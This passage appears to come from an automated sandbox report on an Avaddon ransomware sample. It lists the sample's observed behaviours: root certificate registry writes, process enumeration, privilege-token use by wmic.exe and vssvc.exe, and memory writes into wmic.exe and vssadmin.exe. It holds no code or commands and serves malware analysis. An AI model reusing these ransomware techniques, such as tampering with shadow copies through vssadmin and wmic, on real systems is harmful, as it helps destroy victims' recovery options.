N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3064 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
